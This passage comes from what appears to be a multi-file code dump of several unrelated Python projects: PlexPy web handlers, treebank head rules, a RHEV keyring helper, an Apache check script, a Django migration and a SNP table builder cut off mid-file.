plexpy.CONFIG.PMS_IP: refresh_users = True plexpy.CONFIG.process_kwargs(kwargs) # Write the config plexpy.CONFIG.write() # Get new server URLs for SSL communications. plextv.get_real_pms_url() # Reconfigure scheduler if intervals changed if reschedule: plexpy.initialize_scheduler() # Refresh users table if our server IP changes. if refresh_users: threading.Thread(target=plextv.refresh_users).start() raise cherrypy.HTTPRedirect("settings") @cherrypy.expose def set_notification_config(self, **kwargs): # Handle the variable config options. Note - keys with False values aren't getting passed checked_configs = [ "email_tls" ] for checked_config in checked_configs: if checked_config not in kwargs: # checked items should be zero or one. if they were not sent then the item was not checked kwargs[checked_config] = 0 for plain_config, use_config in [(x[4:], x) for x in kwargs if x.startswith('use_')]: # the use prefix is fairly nice in the html, but does not match the actual config kwargs[plain_config] = kwargs[use_config] del kwargs[use_config] plexpy.CONFIG.process_kwargs(kwargs) # Write the config plexpy.CONFIG.write() cherrypy.response.status = 200 @cherrypy.expose def do_state_change(self, signal, title, timer): message = title quote = self.random_arnold_quotes() plexpy.SIGNAL = signal return serve_template(templatename="shutdown.html", title=title, message=message, timer=timer, quote=quote) @cherrypy.expose def get_history(self, user=None, user_id=None, **kwargs): custom_where=[] if user_id: custom_where = [['user_id', user_id]] elif user: custom_where = [['user', user]] if 'rating_key' in kwargs: rating_key = kwargs.get('rating_key', "") custom_where = [['rating_key', rating_key]] if 'parent_rating_key' in kwargs: rating_key = kwargs.get('parent_rating_key', "") custom_where = [['parent_rating_key', rating_key]] if 'grandparent_rating_key' in kwargs: rating_key = kwargs.get('grandparent_rating_key', "") custom_where = [['grandparent_rating_key', rating_key]] if 'start_date' in kwargs: start_date = kwargs.get('start_date', "") custom_where = [['strftime("%Y-%m-%d", datetime(date, "unixepoch", "localtime"))', start_date]] data_factory = datafactory.DataFactory() history = data_factory.get_history(kwargs=kwargs, custom_where=custom_where) cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(history) @cherrypy.expose def history_table_modal(self, start_date=None, **kwargs): return serve_template(templatename="history_table_modal.html", title="History Data", data=start_date) @cherrypy.expose def shutdown(self): return self.do_state_change('shutdown', 'Shutting Down', 15) @cherrypy.expose def restart(self): return self.do_state_change('restart', 'Restarting', 30) @cherrypy.expose def update(self): return self.do_state_change('update', 'Updating', 120) @cherrypy.expose def api(self, *args, **kwargs): from plexpy.api import Api a = Api() a.checkParams(*args, **kwargs) return a.fetchData() @cherrypy.expose def twitterStep1(self): cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store" tweet = notifiers.TwitterNotifier() return tweet._get_authorization() @cherrypy.expose def twitterStep2(self, key): cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store" tweet = notifiers.TwitterNotifier() result = tweet._get_credentials(key) logger.info(u"result: " + str(result)) if result: return "Key verification successful" else: return "Unable to verify key" @cherrypy.expose def testTwitter(self): cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store" tweet = notifiers.TwitterNotifier() result = tweet.test_notify() if result: return "Tweet successful, check your twitter to make sure it worked" else: return "Error sending tweet" @cherrypy.expose def osxnotifyregister(self, app): cherrypy.response.headers['Cache-Control'] = "max-age=0,no-cache,no-store" from osxnotify import registerapp as osxnotify result, msg = osxnotify.registerapp(app) if result: osx_notify = notifiers.OSX_NOTIFY() osx_notify.notify('Registered', result, 'Success :-)') logger.info('Registered %s, to re-register a different app, delete this app first' % result) else: logger.warn(msg) return msg @cherrypy.expose def get_pms_token(self): token = plextv.PlexTV() result = token.get_token() if result: return result else: logger.warn('Unable to retrieve Plex.tv token.') return False @cherrypy.expose def get_pms_sessions_json(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_sessions('json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') return False @cherrypy.expose def get_current_activity(self, **kwargs): try: pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_current_activity() except: return serve_template(templatename="current_activity.html", data=None) if result: return serve_template(templatename="current_activity.html", data=result) else: logger.warn('Unable to retrieve data.') return serve_template(templatename="current_activity.html", data=None) @cherrypy.expose def get_current_activity_header(self, **kwargs): try: pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_current_activity() except IOError, e: return serve_template(templatename="current_activity_header.html", data=None) if result: return serve_template(templatename="current_activity_header.html", data=result['stream_count']) else: logger.warn('Unable to retrieve data.') return serve_template(templatename="current_activity_header.html", data=None) @cherrypy.expose def get_recently_added(self, count='0', **kwargs): try: pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_recently_added_details(count) except IOError, e: return serve_template(templatename="recently_added.html", data=None) if result: return serve_template(templatename="recently_added.html", data=result['recently_added']) else: logger.warn('Unable to retrieve data.') return serve_template(templatename="recently_added.html", data=None) @cherrypy.expose def pms_image_proxy(self, img='', width='0', height='0', fallback=None, **kwargs): try: pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_image(img, width, height) cherrypy.response.headers['Content-type'] = result[1] return result[0] except: logger.warn('Image proxy queried but errors occured.') if fallback == 'poster': logger.info('Trying fallback image...') try: fallback_image = open(self.interface_dir + common.DEFAULT_POSTER_THUMB, 'rb') cherrypy.response.headers['Content-type'] = 'image/png' return fallback_image except IOError, e: logger.error('Unable to read fallback image. %s' % e) elif fallback == 'cover': logger.info('Trying fallback image...') try: fallback_image = open(self.interface_dir + common.DEFAULT_COVER_THUMB, 'rb') cherrypy.response.headers['Content-type'] = 'image/png' return fallback_image except IOError, e: logger.error('Unable to read fallback image. %s' % e) return None @cherrypy.expose def info(self, item_id=None, source=None, **kwargs): metadata = None config = { "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER } if source == 'history': data_factory = datafactory.DataFactory() metadata = data_factory.get_metadata_details(row_id=item_id) else: pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_metadata_details(rating_key=item_id) if result: metadata = result['metadata'] if metadata: return serve_template(templatename="info.html", data=metadata, title="Info", config=config) else: logger.warn('Unable to retrieve data.') return serve_template(templatename="info.html", data=None, title="Info") @cherrypy.expose def get_user_recently_watched(self, user=None, user_id=None, limit='10', **kwargs): data_factory = datafactory.DataFactory() result = data_factory.get_recently_watched(user_id=user_id, user=user, limit=limit) if result: return serve_template(templatename="user_recently_watched.html", data=result, title="Recently Watched") else: logger.warn('Unable to retrieve data.') return serve_template(templatename="user_recently_watched.html", data=None, title="Recently Watched") @cherrypy.expose def get_user_watch_time_stats(self, user=None, user_id=None, **kwargs): user_data = users.Users() result = user_data.get_user_watch_time_stats(user_id=user_id, user=user) if result: return serve_template(templatename="user_watch_time_stats.html", data=result, title="Watch Stats") else: logger.warn('Unable to retrieve data.') return serve_template(templatename="user_watch_time_stats.html", data=None, title="Watch Stats") @cherrypy.expose def get_user_platform_stats(self, user=None, user_id=None, **kwargs): user_data = users.Users() result = user_data.get_user_platform_stats(user_id=user_id, user=user) if result: return serve_template(templatename="user_platform_stats.html", data=result, title="Platform Stats") else: logger.warn('Unable to retrieve data.') return serve_template(templatename="user_platform_stats.html", data=None, title="Platform Stats") @cherrypy.expose def get_item_children(self, rating_key='', **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_item_children(rating_key) if result: return serve_template(templatename="info_children_list.html", data=result, title="Children List") else: logger.warn('Unable to retrieve data.') return serve_template(templatename="info_children_list.html", data=None, title="Children List") @cherrypy.expose def get_metadata_json(self, rating_key='', **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_metadata(rating_key, 'json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_metadata_xml(self, rating_key='', **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_metadata(rating_key) if result: cherrypy.response.headers['Content-type'] = 'application/xml' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_recently_added_json(self, count='0', **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_recently_added(count, 'json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_episode_list_json(self, rating_key='', **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_episode_list(rating_key, 'json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_user_ips(self, user_id=None, user=None, **kwargs): custom_where=[] if user_id: custom_where = [['user_id', user_id]] elif user: custom_where = [['user', user]] user_data = users.Users() history = user_data.get_user_unique_ips(kwargs=kwargs, custom_where=custom_where) cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(history) @cherrypy.expose def get_plays_by_date(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_per_day(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_dayofweek(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_per_dayofweek(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_hourofday(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_per_hourofday(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_per_month(self, y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_per_month(y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_by_top_10_platforms(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_by_top_10_users(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_stream_type(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_per_stream_type(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_source_resolution(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_by_source_resolution(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plays_by_stream_resolution(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_total_plays_by_stream_resolution(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_stream_type_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_stream_type_by_top_10_users(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_stream_type_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs): graph = graphs.Graphs() result = graph.get_stream_type_by_top_10_platforms(time_range=time_range, y_axis=y_axis) if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_friends_list(self, **kwargs): plex_tv = plextv.PlexTV() result = plex_tv.get_plextv_friends('json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_user_details(self, **kwargs): plex_tv = plextv.PlexTV() result = plex_tv.get_plextv_user_details('json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_server_list(self, **kwargs): plex_tv = plextv.PlexTV() result = plex_tv.get_plextv_server_list('json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_sync_lists(self, machine_id='', **kwargs): plex_tv = plextv.PlexTV() result = plex_tv.get_plextv_sync_lists(machine_id=machine_id, output_format='json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_servers(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_server_list(output_format='json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_servers_info(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_servers_info() if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_server_prefs(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_server_prefs(output_format='json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_activity(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_current_activity() if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_full_users_list(self, **kwargs): plex_tv = plextv.PlexTV() result = plex_tv.get_full_users_list() if result: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(result) else: logger.warn('Unable to retrieve data.') @cherrypy.expose def refresh_users_list(self, **kwargs): threading.Thread(target=plextv.refresh_users).start() logger.info('Manual user list refresh requested.') @cherrypy.expose def get_sync(self, machine_id=None, user_id=None, **kwargs): pms_connect = pmsconnect.PmsConnect() server_id = pms_connect.get_server_identity() plex_tv = plextv.PlexTV() if not machine_id: result = plex_tv.get_synced_items(machine_id=server_id['machine_identifier'], user_id=user_id) else: result = plex_tv.get_synced_items(machine_id=machine_id, user_id=user_id) if result: output = {"data": result} else: logger.warn('Unable to retrieve sync data for user.') output = {"data": []} cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps(output) @cherrypy.expose def get_sync_item(self, sync_id, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_sync_item(sync_id, output_format='json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_sync_transcode_queue(self, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_sync_transcode_queue(output_format='json') if result: cherrypy.response.headers['Content-type'] = 'application/json' return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_server_pref(self, pref=None, **kwargs): pms_connect = pmsconnect.PmsConnect() result = pms_connect.get_server_pref(pref=pref) if result: return result else: logger.warn('Unable to retrieve data.') @cherrypy.expose def get_plexwatch_export_data(self, database_path=None, table_name=None, import_ignore_interval=0, **kwargs): from plexpy import plexwatch_import db_check_msg = plexwatch_import.validate_database(database=database_path, table_name=table_name) if db_check_msg == 'success': threading.Thread(target=plexwatch_import.import_from_plexwatch, kwargs={'database': database_path, 'table_name': table_name, 'import_ignore_interval': import_ignore_interval}).start() return 'Import has started. Check the PlexPy logs to monitor any problems.' else: return db_check_msg @cherrypy.expose def plexwatch_import(self, **kwargs): return serve_template(templatename="plexwatch_import.html", title="Import PlexWatch Database") @cherrypy.expose def get_server_id(self, hostname=None, port=None, **kwargs): from plexpy import http_handler if hostname and port: request_handler = http_handler.HTTPHandler(host=hostname, port=port, token=None) uri = '/identity' request = request_handler.make_request(uri=uri, proto='http', request_type='GET', output_format='', no_token=True) if request: cherrypy.response.headers['Content-type'] = 'application/xml' return request else: logger.warn('Unable to retrieve data.') return None else: return None @cherrypy.expose def random_arnold_quotes(self, **kwargs): from random import randint quote_list = ['To crush your enemies, see them driven before you, and to hear the lamentation of their women!', 'Your clothes, give them to me, now!', 'Do it!', 'If it bleeds, we can kill it', 'See you at the party Richter!', 'Let off some steam, Bennett', 'I\'ll be back', 'Get to the chopper!', 'Hasta La Vista, Baby!', 'It\'s not a tumor!', 'Dillon, you son of a bitch!', 'Benny!! Screw you!!', 'Stop whining! You kids are soft. You lack discipline.', 'Nice night for a walk.', 'Stick around!', 'I need your clothes, your boots and your motorcycle.', 'No, it\'s not a tumor. It\'s not a tumor!', 'I LIED!', 'See you at the party, Richter!', 'Are you Sarah Conner?', 'I\'m a cop you idiot!', 'Come with me if you want to live.', 'Who is your daddy and what does he do?' ] random_number = randint(0, len(quote_list) - 1) return quote_list[int(random_number)] @cherrypy.expose def get_notification_agent_config(self, config_id, **kwargs): config = notifiers.get_notification_agent_config(config_id=config_id) checkboxes = {'email_tls': checked(plexpy.CONFIG.EMAIL_TLS)} return serve_template(templatename="notification_config.html", title="Notification Configuration", data=config, checkboxes=checkboxes) @cherrypy.expose def get_notification_agent_triggers(self, config_id, **kwargs): if config_id.isdigit(): agents = notifiers.available_notification_agents() for agent in agents: if int(config_id) == agent['id']: this_agent = agent break else: this_agent = None else: return None return serve_template(templatename="notification_triggers_modal.html", title="Notification Triggers", data=this_agent) @cherrypy.expose def delete_history_rows(self, row_id, **kwargs): data_factory = datafactory.DataFactory() if row_id: delete_row = data_factory.delete_session_history_rows(row_id=row_id) if delete_row: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps({'message': delete_row}) else: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps({'message': 'no data received'}) @cherrypy.expose def delete_all_user_history(self, user_id, **kwargs): data_factory = datafactory.DataFactory() if user_id: delete_row = data_factory.delete_all_user_history(user_id=user_id) if delete_row: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps({'message': delete_row}) else: cherrypy.response.headers['Content-type'] = 'application/json' return json.dumps({'message': 'no data received'})
wmaier/treetools
trees/transformconst.py
"""treetools: Tools for transforming treebank trees. transformations: constants and utilities Author: Wolfgang Maier <maierw@hhu.de> """ from . import trees # Head rules for PTB (WSJ) from Collins (1999, p. 240) HEAD_RULES_PTB = { 'adjp' : [('left-to-right', 'nns qp nn $ advp jj vbn vbg adjp jjr np jjs dt fw rbr rbs sbar rb')], 'advp' : [('right-to-left', 'rb rbr rbs fw advp to cd jjr jj in np jjs nn')], 'conjp' : [('right-to-left', 'cc rb in')], 'frag' : [('right-to-left', '')], 'intj' : [('left-to-right', '')], 'lst' : [('right-to-left', 'ls :')], 'nac' : [('left-to-right', 'nn nns nnp nnps np nac ex $ cd qp prp vbg jj jjs jjr adjp fw')], 'pp' : [('right-to-left', 'in to vbg vbn rp fw')], 'prn' : [('left-to-right', '')], 'prt' : [('right-to-left', 'rp')], 'qp' : [('left-to-right', ' $ in nns nn jj rb dt cd ncd qp jjr jjs')], 'rrc' : [('right-to-left', 'vp np advp adjp pp')], 's' : [('left-to-right', ' to in vp s sbar adjp ucp np')], 'sbar' : [('left-to-right', 'whnp whpp whadvp whadjp in dt s sq sinv sbar frag')], 'sbarq' : [('left-to-right', 'sq s sinv sbarq frag')], 'sinv' : [('left-to-right', 'vbz vbd vbp vb md vp s sinv adjp np')], 'sq' : [('left-to-right', 'vbz vbd vbp vb md vp sq')], 'ucp' : [('right-to-left', '')], 'vp' : [('left-to-right', 'to vbd vbn md vbz vb vbg vbp vp adjp nn nns np')], 'whadjp' : [('left-to-right', 'cc wrb jj adjp')], 'whadvp' : [('right-to-left', 'cc wrb')], 'whnp' : [('left-to-right', 'wdt wp wp$ whadjp whpp whnp')], 'whpp' : [('right-to-left', 'in to fw')] } # Head rules for NeGra/TIGER from rparse # almost identical to corresponding rules from Stanford parser HEAD_RULES_NEGRA = { 's' : [('right-to-left', 'vvfin vvimp'), ('right-to-left', 'vp cvp'), ('right-to-left', 'vmfin vafin vaimp'), ('right-to-left', 's cs')], 'vp' : [('right-to-left', 'vvinf vvizu vvpp'), ('right-to-left', 'vz vainf vminf vmpp vapp pp')], 'vz' : [('right-to-left', 'vvinf vainf vminf vvfin vvizu'), ('left-to-right', 'prtzu appr ptkzu')], 'np' : [('right-to-left', 'nn ne mpn np cnp pn car')], 'ap' : [('right-to-left', 'adjd adja cap aa adv')], 'pp' : [('left-to-right', 'kokom appr proav')], 'co' : [('left-to-right', '')], 'avp' : [('right-to-left', 'adv avp adjd proav pp')], 'aa' : [('right-to-left', 'adjd adja')], 'cnp' : [('right-to-left', 'nn ne mpn np cnp pn car')], 'cap' : [('right-to-left', 'adjd adja cap aa adv')], 'cpp' : [('right-to-left', 'appr proav pp cpp')], 'cs' : [('right-to-left', 's cs')], 'cvp' : [('right-to-left', 'vz')], 'cvz' : [('right-to-left', 'vz')], 'cavp' : [('right-to-left', 'adv avp adjd pwav appr ptkvz')], 'mpn' : [('right-to-left', 'ne fm card')], 'nm' : [('right-to-left', 'card nn')], 'cac' : [('right-to-left', 'appr avp')], 'ch' : [('right-to-left', '')], 'mta' : [('right-to-left', 'adja adjd nn')], 'ccp' : [('right-to-left', 'avp')], 'dl' : [('left-to-right', '')], 'isu' : [('right-to-left', '')], 'ql' : [('right-to-left', '')], '-' : [('right-to-left', 'pp')], 'cd' : [('right-to-left', 'cd')], 'nn' : [('right-to-left', 'nn')], 'nr' : [('right-to-left', 'nr')], 'vroot' : [('left-to-right', '$. $')] } def get_headpos_by_rule(parent_label, children_label, rules, default=0): """Given parent and children labels and head rules, return position of lexical head. """ if not parent_label.lower() in rules: return default for hrule in rules[parent_label.lower()]: if len(hrule[1]) == 0: if hrule[0] == 'left-to-right': return len(children_label) - 1 elif hrule[0] == 'right-to_left': return 0 else: raise ValueError("unknown head rule direction") for label in hrule[1]: if hrule[0] == 'left-to-right': for i, child_label in enumerate(children_label): parsed_label = trees.parse_label(child_label.lower()) if parsed_label.label.lower() == label: return i elif hrule[0] == 'right-to-left': for i, child_label in \ zip(reversed(range(len(children_label))), reversed(children_label)): parsed_label = trees.parse_label(child_label.lower()) if parsed_label.label.lower() == label: return i return 0 else: raise ValueError("unknown head rule direction") return 0
DragonRoman/rhevm-utils
rhev-keyring.py
#!/usr/bin/env python # # Author: Pablo Iranzo Gomez (Pablo.Iranzo@redhat.com) # # Description: Script for setting the keyring password for RHEV scripts # # Requires: python keyring # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. import optparse import keyring from rhev_functions import * description = """ RHEV-keyring is a script for mantaining the keyring used by rhev script for storing password """ # Option parsing p = optparse.OptionParser("rhev-clone.py [arguments]", description=description) p.add_option("-u", "--user", dest="username", help="Username to connect to RHEVM API", metavar="admin@internal", default=False) p.add_option("-w", "--password", dest="password", help="Password to use with username", metavar="admin", default=False) p.add_option("-W", action="store_true", dest="askpassword", help="Ask for password", metavar="admin", default=False) p.add_option('-q', "--query", action="store_true", dest="query", help="Query the values stored", default=False) (options, args) = p.parse_args() if options.askpassword: options.password = getpass.getpass("Enter password: ") # keyring.set_password('redhat', 'kerberos', '<password>') # remotepasseval = keyring.get_password('redhat', 'kerberos') if options.query: print "Username: %s" % keyring.get_password('rhevm-utils', 'username') print "Password: %s" % keyring.get_password('rhevm-utils', 'password') if options.username: keyring.set_password('rhevm-utils', 'username', options.username) if options.password: keyring.set_password('rhevm-utils', 'password', options.password)
sujith7c/py-system-tools
en_mod_rw.py
#!/usr/bin/python import os,sys,re #Check the OS Version RELEASE_FILE = "/etc/redhat-release" RWM_FILE = "/etc/httpd/conf.modules.d/00-base.conf" if os.path.isfile(RELEASE_FILE): f=open(RELEASE_FILE,"r") rel_list = f.read().split() if rel_list[2] == "release" and tuple(rel_list[3].split(".")) < ('8','5'): print("so far good") else: raise("Unable to find the OS version") #Check Apache installed #TODO # #Test if the rewrite module file present if os.path.isfile(RWM_FILE): print("re write") ##print sys.version_info ##if sys.version_info < (2,7): ## print "This programm works only with the Python 2.7"###
Gatomlo/shareandplay
catalogue/migrations/0015_auto_20170415_1628.py
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-15 14:28 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('catalogue', '0014_auto_20170414_0845'), ] operations = [ migrations.AlterField( model_name='jeux', name='image', field=models.ImageField(null=True, upload_to='photos_jeux/', verbose_name='Image'), ), ]
OLF-Bioinformatics/snp_analysis
binaries/snpTableMaker.py
#!/usr/bin/env python import os import random __author__ = 'duceppemo' class SnpTableMaker(object): """ Everything is ran inside the class because data structures have to be shared across parent and child process during multi threading """ def __init__(self, args): import os import sys import glob import multiprocessing # Define variables based on supplied arguments self.args = args self.ref = args.ref if not os.path.isfile(self.ref): sys.exit('Supplied reference genome file does not exists.') self.vcf = args.vcf if not os.path.isdir(self.vcf): sys.exit('Supplied VCF folder does not exists.') self.minQUAL = args.minQUAL if not isinstance(self.minQUAL, (int, long)): sys.exit('minQual value must be an integer') self.ac1_report = args.ac1 self.section4 = args.section4 self.output = args.output if not os.path.isdir(self.output): os.makedirs(self.output) self.table = args.table # number of threads to use = number of cpu self.cpus = int(multiprocessing.cpu_count()) # create dictionaries to hold data self.refgenome = dict() self.vcfs = dict() self.ac1s = dict() self.ac2s = dict() self.allac2 = dict() self.finalac1 = dict() self.fastas = dict() self.counts = dict() self.informative_pos = dict() # create a list of vcf files in vcfFolder self.vcfList = list() for filename in glob.glob(os.path.join(self.vcf, '*.vcf')): self.vcfList.append(filename) # run the script self.snp_table_maker() def snp_table_maker(self): self.parse_ref() self.parse_vcf() self.find_ac1_in_ac2() self.write_ac1_report() self.get_allele_values() self.get_informative_snps() self.count_snps() self.write_fasta() self.write_root() self.write_snp_table() def parse_ref(self): from Bio import SeqIO print ' Parsing reference genome' fh = open(self.ref, "rU") self.refgenome = SeqIO.to_dict(SeqIO.parse(fh, "fasta")) fh.close() def parse_vcf(self): import sys print ' Parsing VCF files' for samplefile in self.vcfList: sample = os.path.basename(samplefile).split('.')[0] # get what's before the first dot self.vcfs[sample] = dict() with open(samplefile, 'r') as f: # open file for line in f: # read file line by line line = line.rstrip() # chomp -> remove trailing whitespace characters if line: # skip blank lines or lines with only whitespaces if line.startswith('##'): # skip comment lines continue elif line.startswith('#CHROM'): sample_name = line.split("\t")[9] if sample_name != sample: sys.exit('File name and sample name inside VCF file are different: %s' % samplefile) else: # chrom, pos, alt, qual = [line.split()[i] for i in (0, 1, 4, 5)] chrom = line.split()[0] pos = int(line.split()[1]) alt = line.split()[4] qual = line.split()[5] # string -> needs to be converted to integer if qual != '.': try: qual = float(qual) except ValueError: qual = int(qual) else: continue # skip line ac = line.split()[7].split(';')[0] # http://www.saltycrane.com/blog/2010/02/python-setdefault-example/ self.vcfs.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, [])\ .append(alt) if ac == 'AC=1' and qual > self.args.minQUAL: self.ac1s.setdefault(sample, {}).setdefault(chrom, []).append(pos) elif ac == 'AC=2' and qual > self.args.minQUAL: self.ac2s.setdefault(sample, {}).setdefault(chrom, []).append(pos) # This is equivalent, but faster? try: if pos not in self.allac2[chrom]: # only add is not already present self.allac2.setdefault(chrom, []).append(pos) except KeyError: # chromosome does not exist in dictionary self.allac2.setdefault(chrom, []).append(pos) # This works # if chrom in self.allac2: # if pos in self.allac2[chrom]: # pass # else: # self.allac2.setdefault(chrom, []).append(pos) # else: # self.allac2.setdefault(chrom, []) def find_ac1_in_ac2(self): print ' Finding AC=1/AC=2 positions' if isinstance(self.ac1s, dict): # check if it's a dict before using .iteritems() for sample, chromosomes in self.ac1s.iteritems(): if isinstance(chromosomes, dict): # check for dict for chrom, positions in chromosomes.iteritems(): if isinstance(positions, list): # check for list for pos in positions: if pos in self.allac2[chrom]: # check ac1 in ac2 self.finalac1.setdefault(sample, {}).setdefault(chrom, []).append(pos) def write_ac1_report(self): print " Writing AC=1/AC=2 report to file" # free up resources not needed anymore self.ac1s.clear() fh = open(self.ac1_report, 'w') if isinstance(self.finalac1, dict): for sample, chromosomes in sorted(self.finalac1.iteritems()): if isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, list): fh.write("{}\nAC=1 is also found in AC=2 in chromosome {}".format(sample, chrom) + " at position(s): " + ', '.join(map(str, positions)) + "\n\n") fh.close() def get_allele_values(self): print ' Getting allele values' for sample in self.ac2s: for chrom in self.ac2s[sample]: for pos in self.allac2[chrom]: # if in AC=2 for that sample if pos in self.ac2s[sample][chrom]: allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string else: try: # use a try here because some samples are not in finalac1 # if in AC=1 for that sample, but also in AC=2 in other sample if pos in self.finalac1[sample][chrom]: allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string else: allele = self.refgenome[chrom].seq[pos - 1] except KeyError: allele = self.refgenome[chrom].seq[pos - 1] self.fastas.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, []).append(allele) # Track all alleles for each position try: if allele not in self.counts[chrom][pos]: self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele) except KeyError: self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele) def get_informative_snps(self): """SNPs position that have at least one different ALT allele within all the samples""" print ' Getting informative SNPs' # free up resources not needed anymore self.ac2s.clear() self.allac2.clear() self.finalac1.clear() # need to get the positions in the same order for all the sample 